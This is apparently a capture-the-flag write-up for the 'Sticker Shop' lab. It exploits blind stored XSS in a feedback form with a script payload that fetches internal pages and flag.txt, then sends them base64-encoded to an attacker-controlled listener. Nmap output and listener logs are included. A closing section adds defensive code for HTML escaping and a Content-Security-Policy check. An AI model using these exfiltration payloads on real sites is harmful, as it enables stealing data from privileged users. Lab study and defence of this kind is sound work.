The Sticker Shop is an easy-difficulty challenge.
Skill learned: XSS (stored/blind cross-site scripting with out-of-band exfiltration)
┌──(glmx㉿kali)-[~]
└─$ nmap -sC -sV 10.10.27.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 02:00 WIB
Nmap scan report for 10.10.27.7
Host is up (0.37s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:54:8c:e2:d7:67:ab:8f:90:b3:6f:52:c2:73:37:69 (RSA)
| 256 14:29:ec:36:95:e5:64:49:39:3f:b4:ec:ca:5f:ee:78 (ECDSA)
|_ 256 19:eb:1f:c9:67:92:01:61:0c:14:fe:71:4b:0d:50:40 (ED25519)
8080/tcp open http-proxy Werkzeug/3.0.1 Python/3.8.10
|_http-server-header: Werkzeug/3.0.1 Python/3.8.10
|_http-title: Cat Sticker Shop
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.1 Python/3.8.10
| Date: Tue, 31 Dec 2024 19:00:43 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 1655
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <title>Cat Sticker Shop</title>
| <style>
.....
┌──(glmx㉿kali)-[~]
└─$ sudo python3 -m http.server 8081
[sudo] password for glmx:
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
Craft the following payload and submit it on the Feedback page (the feedback is later viewed by an internal user, so the script runs in that user's browser):
<script>
fetch("/", {method:'GET',mode:'no-cors',credentials:'same-origin'})
    .then(response => response.text())
    .then(text => {
        fetch('http://10.2.10.193:8081/' + btoa(text), {mode:'no-cors'});
    });
</script>
After submitting, the listener receives a request carrying the base64-encoded page:
┌──(glmx㉿kali)-[~]
└─$ sudo python3 -m http.server 8081
[sudo] password for glmx:
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.10.27.7 - - [01/Jan/2025 02:09:18] code 404, message File not found
10.10.27.7 - - [01/Jan/2025 02:09:18] "GET /PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD....
....
...
...
iAgICA8YnI+Jm5ic3A7Jm5ic3A7V2Ugb25seSBzZWxsIHN0aWNrZXJzIGF0IG91ciBwaHlzaWNhbCBzdG9yZS4gUGxlYXNlIGZlZWwgZnJlZSB0byBzdG9wIGJ5IQo8L2JvZHk+CjwvaHRtbD4= HTTP/1.1" 404 -
┌──(glmx㉿kali)-[~]
└─$ echo "PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD....lIGZlZWwgZnJlZSB0byBzdG9wIGJ5IQo8L2JvZHk+CjwvaHRtbD4=" | base64 -d
...
...
<!DOCTYPE html>
<html>
<head>
<title>Cat Sticker Shop</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
}
header {
background-color: #333;
color: #fff;
text-align: center;
padding: 10px;
}
....
....
<ul>
<li><a href="/">Home</a></li>
<li><a href="/submit_feedback">Feedback</a></li>
</ul>
</header>
<div class="content">
<h1>Welcome to the Cat Sticker Shop!</h1>
<div class="product">
<img src="/static/images/cat_sticker_1.png" alt="Cat Sticker 1" width="300" height="300">
<h2>Cat Sticker 1</h2>
<p>Price: $2.99</p>
</div>
<div class="product">
<img src="/static/images/cat_sticker_2.png" alt="Cat Sticker 2" width="300" height="300">
<h2>Cat Sticker 2</h2>
<p>Price: $3.99</p>
</div>
</div>
<br> We only sell stickers at our physical store. Please feel free to stop by!
</body>
</html>
Change the target to something more specific, namely flag.txt, and submit again:
<script>
fetch("/flag.txt", {method:'GET',mode:'no-cors',credentials:'same-origin'})
    .then(response => response.text())
    .then(text => {
        fetch('http://10.2.10.193:4444/' + btoa(text), {mode:'no-cors'});
    });
</script>
┌──(glmx㉿kali)-[~]
└─$ sudo python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
10.10.27.7 - - [01/Jan/2025 02:17:43] code 404, message File not found
10.10.27.7 - - [01/Jan/2025 02:17:43] "GET /VEhNezgzN......jIzMDVlZTZ9 HTTP/1.1" 404 -
┌──(glmx㉿kali)-[~]
└─$ echo "VEhNezgzN......jIzMDVlZTZ9" | base64 -d
THM{8.....6}
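The chain above works because the feedback text is rendered into a page viewed by a privileged internal user without output encoding, and nothing stops that user's browser from calling out to an arbitrary host. The following is an added, standalone example (not code from the challenge or from the writeup) showing the two defender-side controls in the same Flask/Werkzeug style stack: HTML-escaping stored feedback before rendering, and a Content-Security-Policy whose connect-src would have blocked the exfiltration fetch to 10.2.10.193 even if injection had succeeded. The vulnerable render function is an assumed reconstruction of the pattern, and the sample feedback entries are constructed.

```python
import html
from urllib.parse import urlsplit

# Constructed sample feedback: a benign entry and one carrying the page's style of payload.
SAMPLE_FEEDBACK = [
    "Love the stickers!",
    "<script>fetch('/flag.txt').then(r=>r.text())"
    ".then(t=>fetch('http://10.2.10.193:4444/'+btoa(t)))</script>",
]

def render_feedback_vulnerable(entries):
    """Assumed vulnerable pattern: feedback interpolated into HTML unescaped."""
    return "<ul>" + "".join(f"<li>{e}</li>" for e in entries) + "</ul>"

def render_feedback_safe(entries):
    """Escape each entry so any markup is displayed as text, never executed."""
    return "<ul>" + "".join(f"<li>{html.escape(e)}</li>" for e in entries) + "</ul>"

# Policy a defender would send with the staff-facing feedback page.
CSP = "default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none'"

def parse_csp(csp):
    """Parse a Content-Security-Policy header value into {directive: [sources]}."""
    policy = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def csp_allows_connect(csp, page_origin, target_url):
    """True if connect-src (falling back to default-src) permits a fetch to target_url.
    Handles 'none', *, 'self' and explicit origin sources; other source forms are ignored."""
    policy = parse_csp(csp)
    sources = policy.get("connect-src", policy.get("default-src"))
    if sources is None:
        return True  # no applicable directive: the browser imposes no restriction
    target = urlsplit(target_url)
    target_origin = f"{target.scheme}://{target.netloc}".lower()
    for src in sources:
        s = src.lower()
        if s == "'none'":
            return False
        if s == "*":
            return True
        if s == "'self'" and target_origin == page_origin.lower():
            return True
        if s.startswith(("http://", "https://")) and target_origin == s.rstrip("/"):
            return True
    return False
```

With the escaped renderer the feedback list shows the payload as literal text, and with the policy above a same-origin fetch to /flag.txt is still permitted while the call-out to http://10.2.10.193:4444 is refused by the browser.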